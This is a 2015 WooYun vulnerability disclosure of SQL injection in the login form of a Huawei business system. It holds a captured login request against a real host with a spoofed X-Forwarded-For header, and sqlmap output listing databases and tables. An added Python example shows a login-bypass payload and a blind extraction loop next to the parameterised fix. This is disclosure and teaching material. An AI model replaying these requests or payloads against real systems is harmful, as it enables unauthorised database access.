
Vulnerability summary

Defect ID: wooyun-2015-0134189

Title: SQL injection and weak password in a Huawei business system

Vendor: Huawei Technologies Co., Ltd.

Author: 路人甲

Submitted: 2015-08-14 18:40

Fixed: 2015-10-01 10:40

Published: 2015-10-01 10:40

Type: SQL injection

Severity: High

Self-rated Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-14: details sent to the vendor, awaiting vendor handling
2015-08-17: vendor confirmed; details visible to the vendor only
2015-08-27: details opened to core white hats and domain experts
2015-09-06: details opened to regular white hats
2015-09-16: details opened to intern white hats
2015-10-01: details opened to the public

Brief description:

SQL injection and weak password in a Huawei business system

Detailed description:

POST /ZFWH/system/login.action HTTP/1.1
Host: 122.226.178.67:86
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://122.226.178.67:86/ZFWH/system/login.action
Cookie: JSESSIONID=UnZsPNfdT2b6nWuqHQk3iw**.node3
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
logName=cs001&password=aaa&groupId=201309250143&button=%E7%A1%AE%E5%AE%9A


Injectable parameter: password (the login form field in the request above). Note that the request also carries a client-supplied X-Forwarded-For: 8.8.8.8 header; any logging, rate limiting or allow-listing on the server side that trusts that header will attribute these requests to 8.8.8.8 instead of the real source address.

(Screenshots 0.jpg, 1.jpg, 2.jpg, 4.jpg, 5.jpg: not reproduced in the text.)
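The request above shows the injection point as the password field of a login form, and the proof section below shows what was pulled back through it (current user BPO and the schema's table list). The following is an added example, not code from the report or from the affected system: it models such a login handler in Python with an in-memory SQLite database standing in for the Oracle backend. The table APP_USER, its columns, the stored credential S3cret!pw and the ZF_EMPLOYEE table are constructed for the example; only the three form parameter names and the cs001 / 201309250143 values come from the captured request. It shows the concatenated query that makes the password field injectable, the parameterised version that closes the hole, and a boolean-based blind loop that recovers a table name one character at a time from nothing but login success or failure, which is the mechanism by which a tool obtains a table listing like the one later on this page.

```python
import sqlite3

# Constructed stand-in for the Oracle backend: an in-memory SQLite database
# with an assumed user table. Only the three form parameters (logName,
# password, groupId) are taken from the report; everything else is made up.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE APP_USER (LOG_NAME TEXT, PASSWORD TEXT, GROUP_ID TEXT)")
    conn.execute("INSERT INTO APP_USER VALUES ('cs001', 'S3cret!pw', '201309250143')")
    # One table with a ZF_ prefix, so the blind probe below has something to find.
    conn.execute("CREATE TABLE ZF_EMPLOYEE (ID INTEGER, NAME TEXT)")
    return conn


def login_vulnerable(conn, log_name: str, password: str, group_id: str) -> bool:
    """The pattern that produces the reported bug: form fields spliced into
    the statement text, so whatever the user types is parsed as SQL."""
    sql = (f"SELECT COUNT(*) FROM APP_USER WHERE LOG_NAME = '{log_name}' "
           f"AND PASSWORD = '{password}' AND GROUP_ID = '{group_id}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn, log_name: str, password: str, group_id: str) -> bool:
    """Same query with bind parameters: values travel separately from the
    statement, so a quote in the password is data, never syntax. (Comparing a
    plaintext password is still wrong; hashing is outside this example.)"""
    sql = ("SELECT COUNT(*) FROM APP_USER WHERE LOG_NAME = ? "
           "AND PASSWORD = ? AND GROUP_ID = ?")
    return conn.execute(sql, (log_name, password, group_id)).fetchone()[0] > 0


def blind_extract(conn, probe_sql: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction through the password parameter: each
    login attempt asks one yes/no question about one character of the
    probe's result, and the login outcome is the answer. SQLite's
    UNICODE/SUBSTR stand in for Oracle's ASCII/SUBSTR."""
    result = ""
    for pos in range(1, max_len + 1):
        hit = None
        for code in range(32, 127):           # printable ASCII
            payload = (f"x' OR (SELECT UNICODE(SUBSTR(({probe_sql}),{pos},1))) = {code} "
                       f"AND '1'='1")
            if login_vulnerable(conn, "cs001", payload, "201309250143"):
                hit = chr(code)
                break
        if hit is None:                       # SUBSTR past the end yields '' -> no match
            break
        result += hit
    return result


if __name__ == "__main__":
    db = make_db()
    bypass = "x' OR '1'='1"
    print("vulnerable login, bypass payload:", login_vulnerable(db, "cs001", bypass, "201309250143"))
    print("fixed login, same payload:       ", login_fixed(db, "cs001", bypass, "201309250143"))
    print("table name leaked via login form:",
          blind_extract(db, "SELECT name FROM sqlite_master WHERE type='table' AND name LIKE 'ZF%'"))
```

On Oracle the same probe would read ASCII(SUBSTR((SELECT user FROM dual),n,1)) = code, which is how a "current user: 'BPO'" result is obtained from a form that only reports success or failure. Parameterising the query removes the injection but not the weak-credential problem the title also names; that needs a password policy and lockout on the account side.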


Proof of vulnerability (sqlmap output; the table listing that follows begins mid-list, its opening lines are missing from the page):

available databases [10]:
[*] BPO
[*] BPOTEST
[*] DBSNMP
[*] GD12345
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
current user: 'BPO'
current schema (equivalent to database on Oracle): 'BPO'
| JBPM30_MODULEDEFINITION |
| JBPM30_MODULEINSTANCE |
| JBPM30_NODE |
| JBPM30_POOLEDACTOR |
| JBPM30_PROCESSDEFINITION |
| JBPM30_PROCESSINSTANCE |
| JBPM30_RUNTIMEACTION |
| JBPM30_SWIMLANE |
| JBPM30_SWIMLANEINSTANCE |
| JBPM30_TASK |
| JBPM30_TASKACTORPOOL |
| JBPM30_TASKCONTROLLER |
| JBPM30_TASKINSTANCE |
| JBPM30_TIMER |
| JBPM30_TOKEN |
| JBPM30_TOKENVARIABLEMAP |
| JBPM30_TRANSITION |
| JBPM30_VARIABLEACCESS |
| JBPM30_VARIABLEINSTANCE |
| JCCBAR_BASIC_CONF |
| KEYWORDS |
| KMS2FILTERS |
| KM_ANNOUNCEMENT |
| KM_AUDIT_COMMENTS |
| KM_AUDIT_CONFIG |
| KM_AUDIT_GROUP |
| KM_FILTER |
| KM_FORBID_TALK |
| KM_FRAGMENT |
| KM_INTEGRATION |
| KM_NOTE |
| KM_RECORD |
| KM_SUMMARY_HINT |
| KM_VIEW_LOG |
| KNOWLEDGE |
| KNOWLEDGE_FILTER |
| KNOWLEDGE_LOAD |
| KNOWLEDGE_MGMT_PARA |
| KNOWLEDGE_STATUS |
| LASTOPERATEID |
| LINK |
| LOAD2LOADED_KNOWLEDGES |
| MAIL_SEND_LIST |
| MARKED_QUES |
| MAS_CONFIG_INFO |
| META_DATA_CATE |
| META_DATA_CATE_2 |
| META_DATA_DEF |
| META_DATA_DEF_2 |
| META_DATA_DEF_CALLLIST |
| META_DATA_DEF_CUSTOMER_2 |
| META_DATA_DEF_ENUM |
| META_DATA_DEF_ENUM_2 |
| MIME_TYPE |
| MMTEMP |
| MM_CONF |
| MM_FAX |
| MM_SMS |
| MODEL2PARAM |
| MODEL_CONF |
| MODEL_PARAM_CONF |
| NGKM_SORT_DIRECTORY |
| NGKM_SORT_TOP_KNOWLEDGE |
| NGKNOWLEDGE |
| NOTE |
| NO_CONFIG |
| OBFAXLIST |
| OBS_POLICY |
| OB_UPLOAD_CONF |
| ORDER_DETAIL |
| ORDER_DETAIL2SIZE |
| ORGAN2GROUP |
| ORGAN_AUTH |
| ORGASTAFF |
| PAGE |
| PIPING_VARIABLE |
| PRDS2SALESCAMPS |
| PRODS2RULES |
| PRODUCT |
| PRODUCT_ORDER |
| PRODUCT_SIZE |
| PRODUCT_TREE |
| PROD_DISC_RULE |
| PXZ_TEMP_0217_1 |
| PXZ_TEMP_0218 |
| PXZ_TEMP_0718_1 |
| PXZ_TEMP_0718_2 |
| PXZ_TEMP_0721 |
| QC_GROUP2ITEMS |
| QC_GROUP_CONF |
| QC_ITEM_CONF |
| QC_RECORD |
| QNAIRES2QUESTIONS |
| QNAIRE_RESULT |
| QNAIRE_STATE |
| QUERY |
| QUES2REL_PAGE |
| QUESTION |
| QUESTIONNAIRE |
| QUESTION_ATTRS |
| QUES_ANSWER |
| QUES_FLOW |
| QUES_VAR |
| QUOTA_CONF |
| QWH20150617 |
| QWH_TEMP_20150212 |
| QWH_TEMP_20150212_2 |
| RECORD_CHANGE |
| RELEVANCE |
| REPORT_CONDITIONS |
| REPORT_FILE_LIST |
| REPORT_MAIN |
| REPORT_TABLE |
| REQ_QUEUE |
| RESP_QUEUE |
| RESULT |
| RIGHT_ANSWERS2RQUES |
| ROOM |
| ROOM_AGENT |
| RPT_QNAIRE_TEMP |
| R_SCM_DEPARTMENT_ROLE |
| R_SCM_ROLE_PRIVILEGE |
| R_SCM_SUBJECT_ROLE |
| SALES_CAMP |
| SCM_AUDIT_LOG |
| SCM_AUDIT_LOG_CODE |
| SCM_LICENSE |
| SCM_LICENSE_EXTEND |
| SCM_LOGIN_MODULE |
| SCM_MGMT_PARA |
| SCM_OBJECT |
| SCM_OPERATE |
| SCM_PRIVILEGE |
| SCM_ROLE |
| SCREEB_CALLTIME_LISTING |
| SCREEB_LINENUM_LISTING |
| SCREEB_ONLINE_LISTING |
| SCREEB_QUEUE_HISTOGRAM |
| SCREEB_TIMELY_CONN |
| SCREEB_TIMELY_CONTE_CALL |
| SCREEB_WORKNUM_LISTING |
| SCREEN_COMPONENT |
| SCREEN_SHOWAREA |
| SEARCH_HITS_STAT |
| SEARCH_LOG |
| SEAT_INFO |
| SIMPLE_KNOWLEDGE |
| SKILL2ACCESSCODE |
| SKILL2AGENT |
| SMS_MO |
| SQLTABLE |
| STAFF |
| STAFF_LIST_ITEM |
| STAFF_MGMT_PARA |
| STAFF_PROFILE |
| SYN_FILE_SERVER_LOG |
| SYN_MAININFO |
| SYS_ACCESSCODE |
| SYS_AGENTSESSION |
| SYS_AGENT_STATUS |
| SYS_AS_STATISTIC |
| SYS_BBS |
| SYS_BUSINESS_ITEM |
| SYS_CODETABLE |
| SYS_CODETABLETIMESTAMP |
| SYS_CUSTOM_MENU |
| SYS_IB_PARA |
| SYS_LIST_ITEM |
| SYS_LOCK |
| SYS_MENU_ENABLE |
| SYS_MGMT_PARA |
| SYS_MODULELOCK |
| SYS_ORGANIZE |
| SYS_ROUTER |
| SYS_SC_AUTHELEMENT |
| SYS_SC_MENU |
| SYS_TENANT |
| SYS_TENANT_CONF |
| SYS_TENANT_CUSTOM |
| SYS_TENANT_SEAT |
| SYS_TENANT_SKILL |
| SYS_TENANT_UAPPHONE |
| S_CODETABLE_COLUMN_DESC |
| TASK |
| TASK2 |
| TASK_COMP_RULE |
| TASK_MNG_CONF |
| TENANT_MGMT_PARA |
| TREE_NODE |
| T_AGT_ANSWER_SITUATION |
| T_AGT_COURSE |
| T_AGT_EXAMPLAN |
| T_AGT_EXAMPLANSTAFF |
| T_AGT_EXAM_SCORE |
| T_AGT_PAPER |
| T_AGT_PAPER2QUESTION |
| T_AGT_PAPERMARK |
| T_AGT_PAPER_TESTITEM |
| T_AGT_RECORD |
| T_AGT_STRATEGY |
| T_AGT_STRATEGY_TESTITEM |
| T_AGT_TESTBYSELF |
| T_AGT_TESTITEM |
| T_AGT_TRAINPLAN |
| T_AGT_TRAINPLANDETAIL |
| T_AGT_TRAINRECORD |
| T_AGT_TRAINSTAFF |
| T_AGT_TYPE |
| T_AG_CENTERPHONENO |
| T_AUDIT_LOG |
| T_AUTHELEMENT |
| T_CF_FORM |
| T_CF_IDEA |
| T_CF_SUBMIT_FORM |
| T_CF_WORKTRAN |
| T_CLEAR_DATA |
| T_CLEAR_MESSAGE |
| T_DEBUG |
| T_FANYA_SATISTY |
| T_GROUPAUTH |
| T_IPCC_QDDC_IVRLOG |
| T_IPCC_WXGL_IVRLOG |
| T_IPCC_XZGH_IVRLOG |
| T_SEQUENCE |
| T_STAFFAUTH |
| USERDEFINED_RELEVANCETYPE |
| VAR_EXPRESSION |
| VDNINFO |
| VIEW_KNOWLEDGE_LOG |
| VOICE_RECORD |
| VOICE_RECORD_ORGANIZE |
| WF_CATEGORY |
| WF_OBJECT_DIRECTORY |
| WF_OBJECT_DIRECTORY_TEMP |
| WIZARD |
| WIZARD_STEP |
| ZF_ACCOUNTABILITY_UNITS_CONF |
| ZF_AUTH_ELEMENT |
| ZF_BIND_CALLNUM |
| ZF_CONDITION_LIST |
| ZF_CONDITION_RELATION |
| ZF_CONDITION_RELATION_QWHBAK |
| ZF_C_AREA |
| ZF_C_BUSI_TYPE1 |
| ZF_C_BUSI_TYPE2 |
| ZF_C_BUSI_TYPE2_QWH |
| ZF_C_DEAL_DPTM |
| ZF_C_DEAL_TYPE |
| ZF_C_DEAL_TYPE1 |
| ZF_C_DEAL_TYPE2 |
| ZF_C_NODE |
| ZF_C_PRIVACY_LEVEL |
| ZF_C_PROPERTY |
| ZF_C_REJECT_TYPE |
| ZF_C_SYS_ERROR |
| ZF_C_TASK_STATUS |
| ZF_C_TEL_ORIGIN |
| ZF_C_TRANS_DEAL_STATUS |
| ZF_C_UNITS |
| ZF_C_UNITS20131023 |
| ZF_C_UPLOAD_PATH |
| ZF_DEAL_UNITS_NAME |
| ZF_EMPLOYEE |
| ZF_LEADERSHIP_REPLY |
| ZF_MANAGER_NAME |
| ZF_ROLE_CONF |
| ZF_R_EMP_UNITS |
| ZF_R_EMP_UNITS_PXZ |
| ZF_R_ROLE_AUTH |
| ZF_R_ROLE_GROUP |
| ZF_SMS_TEMPLATE |
| ZF_UPLOAD_FILE |
| ZF_WF2CHAINHISTORY |
| ZF_WF_CALL_BACK |
| ZF_WF_COMMUNICATION |
| ZF_WF_DELAY_APPLICATION |
| ZF_WF_HISTORY |
| ZF_WF_MAININFO |
| ZF_WF_MAININFOMARK |
| ZF_WF_MAININFO_0718 |
| ZF_WF_MAININFO_BAK |
| ZF_WF_NODE_TIME |
| ZF_WF_REJECT |
| ZF_WF_REPLYINFO |
| ZF_WF_REPLYINFO_0718 |
| ZF_WF_SUPERVISION |
| ZF_WF_SYSLOG |
| ZF_WF_TRANSINFO |
| ZF_WORKDAY |
+------------------------------+

Fix recommendation:

Copyright notice: when reposting, please credit the source, 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Low

Rank: 5

Confirmed: 2015-08-17 10:40

Vendor reply:

Thanks to the white hat for paying attention to Huawei's IT security; we have notified the site administrator to remediate this vulnerability as soon as possible.

Latest status:

None yet